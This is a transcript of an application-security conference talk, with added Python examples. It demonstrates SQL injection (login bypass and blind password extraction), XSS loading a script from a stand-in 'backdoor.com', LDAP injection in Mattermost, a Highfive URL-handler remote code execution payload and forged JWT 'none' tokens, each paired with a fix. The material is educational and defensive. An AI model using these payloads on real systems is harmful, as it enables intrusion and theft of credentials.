
AOEconf17: Application Security - Bastian Ike


Bastian Ike, developer at AOE, talks about Application Security: How security issues develop, and how they are found, exploited and can be mitigated. Security issues usually develop due to assumptions on certain behavior, bugs and just missing knowledge about what is actually possible, and how these bugs can be exploited eventually. Bastian shows how these issues develop, and how attackers utilize and combine bugs to eventually exploit systems and elevate privileges. Bastian also shows how we can mitigate security issues and how to spot them in our code.

https://www.aoe.com

Published in: Software


  1. Application Security, AOE Conf 2017
  2. What is Application Security?
  3. Application Security • Security in software • Not management security, perimeter security, etc. • Possible attack vectors • How to prevent issues
  4. Attack vectors
  5. Code Execution: make a system execute arbitrary code
  6. Buffer Overflows • Assembler code (shellcode) injected into memory • 1996, Aleph One, "Smashing the Stack for Fun and Profit" • Possible by overflowing a program's memory with attacker-controlled data
  7. SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data into a query without proper escaping • Can be used to read/write files on the DB server
  8. Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: the browser (domain/cookies) • Steal/modify cookies • AJAX requests to privileged areas
  9. Cryptography: attack cryptographic measures for confidentiality and integrity
  10. Signatures • Fake signatures/tokens for unauthorised access
  11. Encryption • Break encryption • Missing encryption • Broken encryption, example: Bleichenbacher's attack on RSA PKCS#1 v1.5 padding
  12. Business Logic: make legitimate code behave in an unintended way
  13. Race Conditions • Re-order execution flows to change an operation's result
  14. Exploit basics
  15. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Password: Sesame098 • Resulting query: SELECT * FROM users WHERE username="Bastian" AND password="Sesame098";
  16. SQL Injection • Query: SELECT * FROM users WHERE username="${USERNAME}" AND password="${PASSWORD}"; • Username: Bastian • Password: " OR 1=1 -- x • Resulting query: SELECT * FROM users WHERE username="Bastian" AND password="" OR 1=1 -- x"; (the closing quote is swallowed by the comment, and OR 1=1 makes the WHERE clause true for every row, so the login succeeds without a valid password)
  17. SQL Injection • Query: SELECT * FROM logs WHERE token="${TOKEN}"; • Token: a" AND IF(SUBSTRING((SELECT password FROM users WHERE name="admin" LIMIT 1),1,1) = 'a', SLEEP(5), 0) -- x • Resulting query: SELECT * FROM logs WHERE token="a" AND IF(SUBSTRING((SELECT password FROM users WHERE name="admin" LIMIT 1),1,1) = 'a', SLEEP(5), 0) -- x"; (time-based blind injection: a five-second delay tells the attacker the first character of the admin password is 'a'; MySQL SUBSTRING positions start at 1, so the subquery can be repeated per position and per candidate character)
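The two injections above (the login bypass of slide 16 and the character-by-character extraction of slide 17), as an added example that is not code from the talk. It uses an in-memory SQLite database with constructed sample rows; because SQLite has no SLEEP(), the extraction uses the found/not-found answer of the query as its oracle instead of a delay, which is the same technique with a boolean oracle. The table and column names, the admin password and the `-- ` comment terminator are assumptions of this example.

```python
import sqlite3
import string


def build_db():
    """Constructed sample data (not from the talk): the slide's user plus an
    admin account, and a logs table that gives the oracle a row to count."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Bastian", "Sesame098"), ("admin", "hunter2")])
    conn.execute("CREATE TABLE logs (token TEXT, message TEXT)")
    conn.execute("INSERT INTO logs VALUES ('a', 'first entry')")
    return conn


def login_vulnerable(conn, username, password):
    """Slide 15/16 pattern: user input interpolated straight into the SQL."""
    query = (f"SELECT username FROM users "
             f"WHERE username='{username}' AND password='{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


def token_exists_vulnerable(conn, token):
    """Slide 17 pattern: a lookup that leaks one bit (any row matched or not)."""
    query = f"SELECT COUNT(*) FROM logs WHERE token='{token}'"
    return conn.execute(query).fetchone()[0] > 0


def extract_admin_password(conn, alphabet=string.ascii_letters + string.digits):
    """Boolean-blind extraction: ask 'is character N of the admin password
    equal to X?' for every candidate X, one position at a time. substr()
    positions start at 1 in SQLite and in MySQL."""
    recovered = ""
    while True:
        pos = len(recovered) + 1
        for ch in alphabet:
            payload = (f"x' OR substr((SELECT password FROM users "
                       f"WHERE username='admin'), {pos}, 1)='{ch}' -- ")
            if token_exists_vulnerable(conn, payload):
                recovered += ch
                break
        else:
            return recovered  # no candidate matched: past the last character


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "Bastian", "' OR 1=1 -- x"))  # bypass works
    print(login_safe(db, "Bastian", "' OR 1=1 -- x"))        # None
    print(extract_admin_password(db))                         # hunter2
```

The parameterised version is the fix: the same payload is compared literally against the password column and matches nothing. The extraction loop also shows why a "harmless" endpoint such as a log lookup matters; an attacker needs only a yes/no answer per query.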
  18. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/?page=hello • Rendered: <a href="hello">You are here</a>
  19. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/?page="><script src="http://backdoor.com/x.js"></script> • Rendered: <a href=""><script src="http://backdoor.com/x.js"></script>">You are here</a> (the leading "> closes the attribute and the tag, so the injected script element is parsed as markup)
  20. Cross-Site Scripting • The code runs in the browser of whoever opens the link • Access to cookies and localStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc.)
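The template of slides 18 and 19 rendered with and without attribute escaping, as an added example (not the talk's code). The payload constant is the slide's URL parameter; the parser-based check is an assumption of this example, used to confirm which rendering actually produces a script element rather than just eyeballing the string.

```python
import html
from html.parser import HTMLParser

# The slide's injected value of the ?page= parameter.
SLIDE_PAYLOAD = '"><script src="http://backdoor.com/x.js"></script>'


def render_vulnerable(page):
    """Slide 18/19 pattern: the parameter is interpolated straight into HTML."""
    return f'<a href="{page}">You are here</a>'


def render_escaped(page):
    """Attribute-context escaping. quote=True turns " into &quot;, so the
    attacker can no longer close the href attribute and open a new tag."""
    return f'<a href="{html.escape(page, quote=True)}">You are here</a>'


class TagCollector(HTMLParser):
    """Records every start tag the browser-like parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tag_names(rendered):
    """Which elements does the rendered HTML really contain?"""
    collector = TagCollector()
    collector.feed(rendered)
    return collector.tags


if __name__ == "__main__":
    print(tag_names(render_vulnerable(SLIDE_PAYLOAD)))  # ['a', 'script']
    print(tag_names(render_escaped(SLIDE_PAYLOAD)))     # ['a']
```

Escaping must match the context (HTML body, attribute, JavaScript, URL); `html.escape` covers the attribute case shown here. It does not make the href safe against a `javascript:` URL, which is a URL-validation problem rather than an escaping one.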
  21. Exploit samples
  22. Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed • The differing status codes are an oracle: with a wildcard such as givenName=test* the attacker learns whether an attribute value starts with "test" without ever logging in
  23. Mattermost LDAP Injection
  24. Mattermost LDAP Injection
  25. Mattermost LDAP Injection
  26. Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
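The prevention step of slide 26 as an added example, not Mattermost's code: values placed into an LDAP search filter are escaped per RFC 4515, which replaces the five characters that can change filter structure (`\`, `*`, `(`, `)` and NUL) with `\XX` hex escapes. The attribute name `uid` and the filter shape `(uid=...)` are assumptions of this example.

```python
# RFC 4515 escapes for characters that have meaning inside a filter value.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}

# The slide's login_id payload.
SLIDE_PAYLOAD = "username)(givenName=test*"


def escape_ldap_filter_value(value):
    """Escape a single value for use inside an LDAP filter assertion."""
    return "".join(_LDAP_FILTER_ESCAPES.get(c, c) for c in value)


def login_filter_vulnerable(login_id, attr="uid"):
    """Slide 22 pattern: the login id becomes part of the filter grammar."""
    return f"({attr}={login_id})"


def login_filter_safe(login_id, attr="uid"):
    """The same filter with the value escaped: the parentheses and the
    wildcard are now literal characters of the value being searched for."""
    return f"({attr}={escape_ldap_filter_value(login_id)})"


def filter_component_count(ldap_filter):
    """Number of unescaped '(' in a filter. A single-value login lookup must
    contain exactly one; the injected filter above contains two."""
    return ldap_filter.count("(")


if __name__ == "__main__":
    print(login_filter_vulnerable(SLIDE_PAYLOAD))  # (uid=username)(givenName=test*)
    print(login_filter_safe(SLIDE_PAYLOAD))        # (uid=username\29\28givenName=test\2a)
```

Escape the value, never the whole filter, and keep attribute names out of user control entirely. LDAP client libraries usually ship such a helper (ldap3, for instance, has `escape_filter_chars`); use the library's own rather than a hand-rolled one in production.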
  27. Highfive RCE • Target: the highfive:// URL handler • Possible arguments: ?domain=, ?protocol=
  28. Highfive RCE • Two contexts inside the Highfive sandbox (NW.js): privileged (execute processes, etc.) and non-privileged (display web pages) • Whitelist: https://highfive.com, https://dev.highfive.com
  29. Highfive RCE • highfive://test.com.a/?domain=alert(require('child_process').execSync('hostname;echo;id').toString())//&protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: javascript://alert(require('child_process').execSync('hostname;echo;id').toString())//something
  30. Highfive RCE • Redirecting to javascript:// does not change the sandbox, so the script runs with Node's require() available and can spawn processes • Works on any operating system • Thank you JavaScript 😙
  31. Highfive RCE • Prevention: whitelist redirect targets
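Slide 31's prevention, and the URL-validation gap left open by the XSS example of slides 18 to 20 (escaping does not stop a `javascript:` href), as one added example that is not Highfive's code. It rebuilds the `protocol + '://' + domain + path` concatenation from slide 29, then compares two allowlist checks: a string-prefix check, which looks reasonable but is bypassable, and a parsed scheme-plus-host check. The allowlist is taken from slide 28; the helper names are assumptions of this example.

```python
from urllib.parse import urlsplit

# Allowed (scheme, host) pairs, from the whitelist shown on slide 28.
ALLOWED_ORIGINS = {("https", "highfive.com"), ("https", "dev.highfive.com")}

# The slide's ?domain= value (the slide's ?protocol= value is "javascript").
SLIDE_DOMAIN = ("alert(require('child_process')"
                ".execSync('hostname;echo;id').toString())//")


def build_redirect(protocol, domain, path="/"):
    """The concatenation described on slide 29."""
    return f"{protocol}://{domain}{path}"


def is_allowed_naive(url):
    """Prefix check. Passes https://highfive.com.evil.com/ and
    https://highfive.com@evil.com/, so it is not an origin check at all."""
    return any(url.startswith(f"{scheme}://{host}")
               for scheme, host in ALLOWED_ORIGINS)


def is_allowed(url):
    """Parse first, then compare the exact (scheme, host) pair. urlsplit
    lowercases the scheme; .hostname lowercases the host and strips
    userinfo and port, so a javascript: URL or a look-alike host fails."""
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.hostname) in ALLOWED_ORIGINS


def safe_redirect(protocol, domain, path="/"):
    """Build the target, but only hand it on if it is on the allowlist."""
    url = build_redirect(protocol, domain, path)
    return url if is_allowed(url) else None


if __name__ == "__main__":
    print(build_redirect("javascript", SLIDE_DOMAIN, "something"))
    print(safe_redirect("javascript", SLIDE_DOMAIN, "something"))  # None
    print(safe_redirect("https", "dev.highfive.com", "/room/1"))
```

The same parsed check is what an `href` or redirect parameter needs in the XSS case: decide on scheme and host after parsing, not on what the string starts with.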
  32. JWT Null Tokens
  33. JWT Null Tokens
  34. JWT Null Tokens
  35. JWT Null Tokens
  36. JWT Null Tokens • Prevention: do not allow null signature algorithms (reject tokens whose header claims "alg": "none", and pin the algorithm the server expects instead of trusting the one named in the token)
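The null-token problem of slides 32 to 36 as an added example, not the talk's code and not any JWT library: a minimal HS256 signer, a forged token whose header says `"alg": "none"`, and two verifiers. The first trusts the header's `alg` field and so accepts the forgery; the second pins HS256 and ignores the header. The key, claims and helper names are assumptions of this example; it uses only the standard library.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(raw):
    """JWT base64url: no padding."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload, key):
    """A genuine token: header.payload.HMAC-SHA256(header.payload)."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_none_token(payload):
    """What the attacker sends: alg set to none and an empty signature."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(payload)}."


def _hs256_valid(header_b64, payload_b64, sig_b64, key):
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def verify_insecure(token, key):
    """Trusts the token's own alg field: 'none' means 'no signature needed'."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    if header.get("alg") == "HS256" and _hs256_valid(h, p, s, key):
        return json.loads(b64url_decode(p))
    return None


def verify_strict(token, key):
    """Pins the algorithm the server issued with; the header cannot change it."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        return None
    if not _hs256_valid(h, p, s, key):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    key = b"server-secret"  # assumed server-side HMAC key
    forged = forge_none_token({"sub": "bastian", "role": "admin"})
    print(verify_insecure(forged, key))  # {'sub': 'bastian', 'role': 'admin'}
    print(verify_strict(forged, key))    # None
```

In a real deployment pass an explicit algorithm list to the JWT library rather than reading it from the token; the strict verifier above is what that option does internally.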
  37. Preventive actions
  38. Finding security issues • Code reviews • Curiosity • (sometimes: automated scanners)
  39. Stay up to date
  40. React fast
  41. React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possibly infected systems • Snapshot infrastructure for later analysis
  42. Thank you :) Questions?
